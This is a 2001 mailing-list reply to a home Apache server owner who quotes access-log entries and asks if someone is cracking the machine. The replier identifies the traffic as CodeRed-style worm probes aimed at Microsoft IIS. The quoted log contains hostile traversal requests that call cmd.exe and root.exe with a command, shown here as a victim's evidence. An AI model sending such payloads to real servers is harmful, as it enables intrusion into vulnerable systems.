Re: Being cracked? (need help on apache log files)
On Mon, 2001-10-29 at 15:55, Ole Sebastian Stein wrote:
> We just got our ADSL and now have a server running Apache on a potato box
> at home. DynDNS provides us with dynamic dns.
>
> Today I found these lines in my acces.log:
>
> 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HT
> TP/1.0" 404 210
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP
> /1.0" 404 208
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 218
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/
> c+dir HTTP/1.0" 404 218
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c
> .../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c
> .../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
>
> and so on. To me it looks as if 213.145.168.244 is trying
> to execute some file giving him root access. Are someone trying to
> crack my machine? What should I do?
That's the good old CodeRed worm and varients. Don't worry - it only
attacks Microsoft IIS 4+5.
Ross
Reply to: